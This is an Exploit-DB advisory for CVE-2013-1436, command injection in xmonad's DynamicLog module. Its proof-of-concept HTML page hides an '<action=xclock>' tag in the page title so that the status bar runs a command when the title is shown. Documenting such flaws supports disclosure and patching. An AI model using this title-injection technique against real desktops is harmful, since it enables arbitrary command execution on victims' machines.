xmonad XMonad.Hooks.DynamicLog Module Multiple Remote Command Injection Vulnerabilities

2013-07-26T00:00:00
ID EDB-ID:38680
Type exploitdb
Reporter Joachim Breitner
Modified 2013-07-26T00:00:00

Description

xmonad XMonad.Hooks.DynamicLog Module Multiple Remote Command Injection Vulnerabilities. CVE-2013-1436. Remote exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/61491/info

XMonad.Hooks.DynamicLog module for xmonad is prone to multiple remote command-injection vulnerabilities.

Successful exploits will result in the execution of arbitrary commands in the context of the affected applications. This may aid in further attacks. 

<html>
<head>
<title><action=xclock>An innocent title</action></title>
</head>
<body>
<h1>Good bye, cruel world</h1>
</body>
</html>